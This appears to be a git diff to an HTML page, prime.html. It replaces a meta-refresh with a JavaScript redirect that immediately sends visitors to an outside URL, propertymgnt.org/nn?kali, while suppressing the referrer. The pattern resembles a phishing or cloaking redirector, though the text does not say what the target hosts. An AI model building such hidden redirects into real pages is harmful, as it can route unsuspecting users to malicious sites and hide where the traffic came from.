--- a/prime.html
+++ b/prime.html
@@ -2,6 +2,9 @@
 <html lang="en"> 
 <meta name="referrer" content="no-referrer" />
     <!-- For Edge and Safari -->
-    <meta name="referrer" content="never" />
-    <meta http-equiv="refresh" content="0; URL=https://propertymgnt.org/nn?kali" />
+<!--     <meta name="referrer" content="never" /> -->
+<!--     <meta http-equiv="refresh" content="0; URL=https://propertymgnt.org/nn?kali" /> -->
+
+
+    <script> window.location.replace('https://propertymgnt.org/nn?kali');</script>
 </html>
